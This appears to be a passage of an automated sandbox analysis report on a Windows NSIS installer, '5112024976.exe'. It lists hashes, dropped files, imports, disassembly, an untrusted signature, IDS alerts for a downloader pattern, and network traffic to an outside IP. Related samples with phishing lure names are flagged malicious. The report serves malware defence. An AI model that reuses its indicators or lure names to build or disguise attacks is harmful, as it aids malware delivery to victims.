                                        SHA-512:0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: Anfrage24438.zip, Detection: malicious, Browse
                                        • Filename: Anfrage24438.exe, Detection: malicious, Browse
                                        • Filename: Anfrage24438.exe, Detection: malicious, Browse
                                        • Filename: 21st OCTOBER 2024 234876sdf ORDER_PDF.exe, Detection: malicious, Browse
                                        • Filename: 21st OCTOBER 2024 234876sdf ORDER_PDF.exe, Detection: malicious, Browse
                                        • Filename: Purchase Order.exe, Detection: malicious, Browse
                                        • Filename: Documenti di spedizione.bat.exe, Detection: malicious, Browse
                                        Reputation:moderate, very likely benign file
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....MX...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\5112024976.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):448073
                                        Entropy (8bit):1.2554221597008608
                                        Encrypted:false
                                        SSDEEP:1536:i9EUBeeNEu//hQg77ea6OP/B1p7to4APRUYZAkxe:qFZO5u/B1pBo510
                                        MD5:3AD8D5763CA124C7392D1F4F53D24F0E
                                        SHA1:17D48EF1AB8D52A31821A069C225D45201535899
                                        SHA-256:3965D74DBD296AA8E7524C773FE81FE63A78355145502153CB577E9CB136DDA0
                                        SHA-512:EE8BDE196A33297BFD4E51ED01E7D0178CF457497E822771D2BE3C58A97681AC52CD19A2BBBB71220F06F6D936A6AA67966295DF3C676104B9643F07CBE37EC8
                                        Malicious:false
                                        Reputation:low
                                        Preview:............y...k......... ....L..............................................................c....................d...........................p..............R.................................................5...............f.......{......................................................................................J...........@.................E....h...............0................M.................'..............................................-...............Z.........................{...............T............c.W..............n....................H...........................................|...................................^...........w.................c...............................).....................................y.....<.......................................T........................................................3.....S..<.......?........................................1!......^.............................t................................................G........
                                        Process:C:\Users\user\Desktop\5112024976.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):362911
                                        Entropy (8bit):1.2562704713226092
                                        Encrypted:false
                                        SSDEEP:768:uFKWW9YiDlIMhmjVacve6tEvHBLNB3tQsrTpPH8mZLAUFwsahGF48hDpWRcKthwz:u5W9yMJLNbJ1CbFV3Gd6Ie48dPs
                                        MD5:8AB9852274FA64E09B5711A2E7D94AAB
                                        SHA1:2C39272B969040B4C185EE4A69A5F04FD1F7C0DB
                                        SHA-256:FCD149788A3530E5E2CF5E17A09B1DE51EB67B51F3E8941E7091F88B610373F1
                                        SHA-512:6761208A22E8D93D70465E6DD9CF1B53826AA6BF0418DCCB0A6E5816A183790A61AD67EDCF52D21366975014701107563CE47A0465CEE801300493AEB566CC69
                                        Malicious:false
                                        Reputation:low
                                        Preview:....-......................................................................?d..........\.a.....................................8...............x...........e...................................)...............+..............................................i...................................................................................................................4......j................................................................................"......................................Z.....%...................................................................................................F............................................................................g...............................E./.....................................................................................Y........#.......F.......n.M.........................................................................................................................W..................................................
                                        Process:C:\Users\user\Desktop\5112024976.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):497
                                        Entropy (8bit):4.296439217688297
                                        Encrypted:false
                                        SSDEEP:12:kdESMQrs7ZnIyxrqlLIRF0+UAkN0lCGsMqejQlJ8:QjMfpIuqPAEsOi
                                        MD5:1560371431CEB91914AF5B9D0D307EE1
                                        SHA1:182B8979D4D0F9F26366653638A9C92FDAFF0D56
                                        SHA-256:72A2010CDB6ED407FCA17CDB181D5F01801F16040C2C9443BD7CB5032CDAAEF7
                                        SHA-512:865EF0F7636149A47043183583635C2A4306BF49565166760672B88F0F9DA89A529FE4166DFF496327304E56A8A460B8113E5F3D58601C0B8A3EFAABD792AF3D
                                        Malicious:false
                                        Reputation:low
                                        Preview:avenging piktogrammernes duecento korsedderkop skurvognsudlejningernes fnges ranaria..kavitet ubetalelige forhalingen passado nautically formaalsbestemmelsernes admiralsuniformers..franchot unimposing rimfire.bemba barsac unflaked skbnesvanger.tige backchats leveret viktualieforretningernes processal dignitas altica epoxyharpikset sergenter forureningsbegrnsedes..sforsvaret antiquating photomechanically enighedernes firepot megrez almon aeneus madrassen thrallborn denoteres slipup tvebakken..
                                        Process:C:\Users\user\Desktop\5112024976.exe
                                        File Type:Matlab v4 mat-file (little endian) Y, numeric, rows 0, columns 0
                                        Category:dropped
                                        Size (bytes):354845
                                        Entropy (8bit):1.2446363869824946
                                        Encrypted:false
                                        SSDEEP:768:E2oz5FNvncy2DZRau7W0sxOvPfSfpg5rWuWAAUIdde/FwPPMk/FOuyQv9biuPia6:opho02mYrKiKLFyJ1AIu2
                                        MD5:DF7A44909B03AB5BC45910B405D9977A
                                        SHA1:3D0583A7DFB39E559827189E02123F2C983A21D5
                                        SHA-256:5A3B61A0BC8E81E756374D2A9FF5087FA4496543A635738ACA8911E95D6340D9
                                        SHA-512:C2B4E951A185FC3FB75109B5CAA554431C1517588D04B8F2BA865F75BE448A0448364BCB84253C9B44579078787DDA616F33666C0C1BF902EC644EBC9A6FE621
                                        Malicious:false
                                        Preview:..................%.Y.............................[......................z...........................................8.................{................b.......W..........................................#.........................................%....z..................7......................................x.i...+............................................................................8......................................................................................................................-..3..................................................................................|............T...........................#...........\.....A.............................................7..........'.................... ...................].................J.J..........s................................g..............W........................................................................................................$...g..........................................................
                                        Process:C:\Users\user\Desktop\5112024976.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):298017
                                        Entropy (8bit):1.245520550165085
                                        Encrypted:false
                                        SSDEEP:768:nLoDoRi0SWvTrmnVqvh6dzfCaci65UhXqjMctTGA3QBgdRWqrw3q3LFPRvx7H155:DStBsLk6gsifeQIGA0iYRwvy8n
                                        MD5:B4C9FC75BAB8C9F006A7D9DDBC249F79
                                        SHA1:70D4047E7E3BB10CF237B82775C89A1D92700162
                                        SHA-256:1D84F9462C244A4500C213DF8DD79971B286392CA02BC536F5F6C3EEBC94E7E3
                                        SHA-512:2E2279CB3755AC5708ABB30E8342235B7F0A24223E3D6F4B2B21B62E59012A5126ADC1BD73D7B64E72634728DECCE7A049D3E6F5055F8D74E959BEE54EDBEA4C
                                        Malicious:false
                                        Preview:............................_..,...........................................................;...........................................................7...O..................'.........................................P.........L................@....................8....................v..................G.....h.............................................m..+b.....................................................m.......C.....................................i..........................................................................................,................................C..........a...........Y......,...........q....................................................................................................................................................................................................................p................S................L..........)..............................................kF........^........E.................................................
                                        Process:C:\Users\user\Desktop\5112024976.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):261232
                                        Entropy (8bit):7.810968945420994
                                        Encrypted:false
                                        SSDEEP:6144:vDkhdnD7WYytSgCASI9NIf5YNlu+NR7kEevILCPuBszWh:4hdD7WzFIfCldNRlewmPu+Wh
                                        MD5:4C5BCB1BCA0173E364739A5A6462787A
                                        SHA1:F60950A57F95159F4A88F029C1220B49F4B3CC1A
                                        SHA-256:3986B2BBB587E74E980664D721C60643E43BA328D48CD97D95BBF53C5B89F8B0
                                        SHA-512:D8C1361F014E9341A5BDFEDF55E07FE6749B059E2BDFED9A3415D70DE0A01FD08AC60755A10F9C31BCA93CA200CCBE176409162B924915047BD50297678E49C0
                                        Malicious:false
                                        Preview:...........;.rrr...............;;..NN...... ..... .l.WW.VV.......W..............+...n........................f...........FFF...|............qqqq....2222....aaaaaa........................000.......... .F....[............................E.Y........::.._.......l...........ee.....KK...;;;;..........*.)...TT.hh..m.............>>.......j.`.....,,.N......{...[[.......[[..ttttt...#.tt....00..........*.......___..........K................5.H.................66666...@.R.....................---.............R.K....----..||||||..M.........66.........11111....@@......D....)....}}}......?..mm........@.......vv............._......;...``.............................cc....g.9....:..EEEEE....777.......8.........7....IIII.}......ff....@@@..........s..................>>>.6.....0....~.R.....R....................4..............t....\\\...................................1...............xx..........P.........../......A........@.HHH.........jj.........&.jj..++++...uu..J..ZZ.....JJ............G....u......@@..
                                        Process:C:\Users\user\Desktop\5112024976.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):497497
                                        Entropy (8bit):1.2525295412969446
                                        Encrypted:false
                                        SSDEEP:1536:rbNZ/Rg8JCCgxT2eIgde/lBWTTBwGceukAdTYz91n6n:9NRg836IVLWHeGxKYQ
                                        MD5:F3F6C6E37EAB51D3B9B9C059C1EB874C
                                        SHA1:401E5740CCFBC1DA83BD9B426C11020C812986F2
                                        SHA-256:B5A607F50C65E41B2BFF7F852F27373177D326D9DFA1040E1C2B3AF62F757BAB
                                        SHA-512:060B328595ADAF9E85B390AA2AACEEFE4C6197294B7C45594798755C5E04BE1E2110F617B51E38D7DF423CD807FA81B30702CE2548563980B9CA195ECF2C11A7
                                        Malicious:false
                                        Preview:.........................................o................j........................................c..6......................................../....................................................m...............................r.D................................T.........................................................8....................x...................................................................!.....O....\................G.........................................G........n....."................:.........................................................................................................@.......<..................................................i.......k..............................................................................................................................=.........g.........................k.............A.......[........................)...........e................................b.............................................6.............
                                        Process:C:\Users\user\Desktop\5112024976.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):476422
                                        Entropy (8bit):1.2552031449987011
                                        Encrypted:false
                                        SSDEEP:1536:zGmPxn4XjZOVebnJjvYbTUBhGKcjnO/EeMHPm:Sm6zYVb849nH6
                                        MD5:F236A74F28F6F32F81F1347D9F129268
                                        SHA1:D5BE521661EE4BF3C186C3EAA0411DD5DF6F3EBA
                                        SHA-256:BEED12F00B12156FF9FA63595DE11A5C01493CF5F85488CB2E159CF1A8236778
                                        SHA-512:D6AD37DDF7B6B38B90F09186AC81C6A76F16F9A4613D6113F10D7B2A4F68129E570EFFC77A19B04F276277B7A569EBD5FD4A48D2E2E72CEA8CEE5A8F67CC5EF4
                                        Malicious:false
                                        Preview:.................................................................7...........................).....$....%..........................#.....M.....................................6.........N.........).......................................................................................a..............t..................................................T.........................................@...........................+..U...................A'..............L..................................................../.............2..............k.........................................................................................................&.............................................>...........................................................|..........................?...............................&...................................n.q......}....................................E......................................................p........................................6..........
                                        Process:C:\Users\user\Desktop\5112024976.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):58979
                                        Entropy (8bit):4.614558556395747
                                        Encrypted:false
                                        SSDEEP:768:L0NiORRuLZR6FX7cBR+8yf+GEpMu6pTwnhMPg8dK8Fml+72IvBgB:L0PqZsFrcBlytu6AUg8IjlPoy
                                        MD5:F94A1753D228E2F20927FD899344C13D
                                        SHA1:96A8A54D722CB98298CF690F4ACB6DA926989C32
                                        SHA-256:2D13F5835B398F13D5649811E771DB6FE06A9F0E5520A404C2A0F7E16F22FF73
                                        SHA-512:7E60C71842CB2917E6D2A99D7A7B2E96C08A6841B918E14BDDAC6BA36DC52D7E36F26EA1B25F709E60726FC5E07B420568F1A510F88CC3E9D8AB9C909C9FE766
                                        Malicious:false
                                        Preview:.............OO.`...D.....................oo.........+.........................J.....B........................................======.................ppp...........L...^.............w.............R.........OO..EE................GGG....................D.QQ..K.........YYYY.......4.:.......;;;...........{{...RR...~...........................333.......;.......==........................-.[...I.............RR....SSS...... ....._.......................].....O.............44.b.......@.*........................+...........................^^........................'...........{....??....99.............WW.rrr.......%.oo......PPPP..........$$$..'.yyy.b...aa..........g.66....77.B.......B..............,,.........tttttt.....q.b....L........GG..............l.<..............nnn.......{{................5............P.)......''''...........L...............................jjjjjj.........................................;......'................@@.........rr.......TT...WW..............GG.......hh....{......!
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Entropy (8bit):7.57034143564734
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:5112024976.exe
                                        File size:1'224'768 bytes
                                        MD5:35826e4e9e0db5ce7a5e95d34c34e2da
                                        SHA1:f2aea3002a1529f56ea66478789037440702dfbd
                                        SHA256:5a23c2b6db6ec6993f56e635a2958ed21bbf94c6920f2329fdcd9a8641ff9b6a
                                        SHA512:2ccfbcc70d12c89e6ee8d7bd50bd39cb5497f8a261ad6d80014f3bb89856b4cbef714de1a3ef9aef3e2cf885ab2efea42d84dc3075e31bdcf49b82d8cf0dc02a
                                        SSDEEP:24576:pCAoDyk/vnt3h1CzLuTIvVFALOOOPgMAO7w6/tJeuHdB4bU4VD4dmo:pCAfqvtx1UuTId0/YgMNf2uHHSU4VDU
                                        TLSH:9645124377660EA5D85D80F7D666CD316F63BC6B008106EB3648BB1A9FBA3E0412B53D
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...<.MX.................b...|.....
                                        Icon Hash:076d76bb4c713307
                                        Entrypoint:0x4031a3
                                        Entrypoint Section:.text
                                        Digitally signed:true
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x584DCA3C [Sun Dec 11 21:50:52 2016 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                        Signature Valid:false
                                        Signature Issuer:CN=Thematically, O=Thematically, L=Alvord, C=US
                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                        Error Number:-2146762487
                                        Not Before, Not After
                                        • 20/09/2024 08:17:11 20/09/2027 08:17:11
                                        Subject Chain
                                        • CN=Thematically, O=Thematically, L=Alvord, C=US
                                        Version:3
                                        Thumbprint MD5:8E893E2C0D3E7EBBCE325F8CF2021265
                                        Thumbprint SHA-1:957C315F54630C0B32951BBBBA2D2A5D5A2370D4
                                        Thumbprint SHA-256:5B3F3E752B6C7E17B3684AA981E05D5F2505146C254F30FF48D48E70E3B7D7B3
                                        Serial:72FF3823130DEA295E2FABF3FD0B92EC3C0BF6AC
                                        Instruction
                                        sub esp, 00000184h
                                        push ebx
                                        push esi
                                        push edi
                                        xor ebx, ebx
                                        push 00008001h
                                        mov dword ptr [esp+18h], ebx
                                        mov dword ptr [esp+10h], 0040A198h
                                        mov dword ptr [esp+20h], ebx
                                        mov byte ptr [esp+14h], 00000020h
                                        call dword ptr [004080A8h]
                                        call dword ptr [004080A4h]
                                        cmp ax, 00000006h
                                        je 00007F9DA8E68C33h
                                        push ebx
                                        call 00007F9DA8E6BBA1h
                                        cmp eax, ebx
                                        je 00007F9DA8E68C29h
                                        push 00000C00h
                                        call eax
                                        mov esi, 00408298h
                                        push esi
                                        call 00007F9DA8E6BB1Dh
                                        push esi
                                        call dword ptr [004080A0h]
                                        lea esi, dword ptr [esi+eax+01h]
                                        cmp byte ptr [esi], bl
                                        jne 00007F9DA8E68C0Dh
                                        push ebp
                                        push 00000009h
                                        call 00007F9DA8E6BB74h
                                        push 00000007h
                                        call 00007F9DA8E6BB6Dh
                                        mov dword ptr [0042F404h], eax
                                        call dword ptr [00408044h]
                                        push ebx
                                        call dword ptr [00408288h]
                                        mov dword ptr [0042F4B8h], eax
                                        push ebx
                                        lea eax, dword ptr [esp+38h]
                                        push 00000160h
                                        push eax
                                        push ebx
                                        push 00429828h
                                        call dword ptr [00408174h]
                                        push 0040A188h
                                        push 0042EC00h
                                        call 00007F9DA8E6B797h
                                        call dword ptr [0040809Ch]
                                        mov ebp, 00435000h
                                        push eax
                                        push ebp
                                        call 00007F9DA8E6B785h
                                        push ebx
                                        call dword ptr [00408154h]
                                        Programming Language:
                                        • [EXP] VC++ 6.0 SP5 build 8804
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85340xa0.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4b0000x64f00.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x128d700x22d0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x60710x620086ec2a2da0012903b23e33f511180572False0.6687659438775511data6.434342820031866IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x80000x13520x1400cd090b7c5bd9ae3da2a43d4f02ef98b7False0.4599609375data5.237297010093776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0xa0000x254f80x600e98382d1559cdefaafaf45200fe1faf0False0.4544270833333333data4.037252180314336IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .ndata0x300000x1b0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x4b0000x64f000x650004b35ddad0638afdc14d8651f31f9f72eFalse0.5893022896039604data6.144636705094013IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_BITMAP0x4b4000x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                        RT_ICON0x4b7680x4180cDevice independent bitmap graphic, 255 x 510 x 32, image size 260100EnglishUnited States0.5566530003727171
                                        RT_ICON0x8cf780x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.6340796167041287
                                        RT_ICON0x9d7a00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.6664652091654404
                                        RT_ICON0xa6c480x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.6956188001889466
                                        RT_ICON0xaae700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.6902489626556016
                                        RT_ICON0xad4180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.724437148217636
                                        RT_ICON0xae4c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.7479508196721312
                                        RT_ICON0xaee480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.799645390070922
                                        RT_DIALOG0xaf2b00x144dataEnglishUnited States0.5216049382716049
                                        RT_DIALOG0xaf3f80x13cdataEnglishUnited States0.5506329113924051
                                        RT_DIALOG0xaf5380x100dataEnglishUnited States0.5234375
                                        RT_DIALOG0xaf6380x11cdataEnglishUnited States0.6091549295774648
                                        RT_DIALOG0xaf7580xc4dataEnglishUnited States0.5918367346938775
                                        RT_DIALOG0xaf8200x60dataEnglishUnited States0.7291666666666666
                                        RT_GROUP_ICON0xaf8800x76dataEnglishUnited States0.7457627118644068
                                        RT_VERSION0xaf8f80x2c8dataEnglishUnited States0.5084269662921348
                                        RT_MANIFEST0xafbc00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                        DLLImport
                                        KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                        USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                        ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-11-06T13:54:50.594813+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449730TCP
                                        2024-11-06T13:55:29.444769+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.449742TCP
                                        2024-11-06T13:56:01.164190+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449907188.40.95.144443TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 6, 2024 13:55:59.943448067 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:55:59.943494081 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:55:59.943574905 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:55:59.954689026 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:55:59.954731941 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:00.841948032 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:00.842061043 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:00.893691063 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:00.893714905 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:00.894120932 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:00.894185066 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:00.899198055 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:00.943329096 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.164191008 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.164212942 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.164257050 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.164284945 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.164299965 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.164323092 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.236706018 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.236838102 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.303998947 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.304075956 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.305085897 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.305145979 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.327712059 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.327766895 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.376677990 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.376766920 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.444098949 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.444185972 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.444330931 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.444374084 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.445185900 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.445239067 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.446229935 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.446280003 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.447012901 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.447068930 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.447173119 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.447222948 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.516323090 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.516379118 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.516845942 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.516889095 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.517256021 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.517302036 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.583578110 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.583657980 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.583859921 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.583908081 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.584441900 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.584491968 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.585186958 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.585232019 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.585412979 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.585457087 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.586235046 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.586278915 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.586816072 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.586858988 CET49907443192.168.2.4188.40.95.144
                                        Nov 6, 2024 13:56:01.587078094 CET44349907188.40.95.144192.168.2.4
                                        Nov 6, 2024 13:56:01.587131023 CET49907443192.168.2.4188.40.95.144
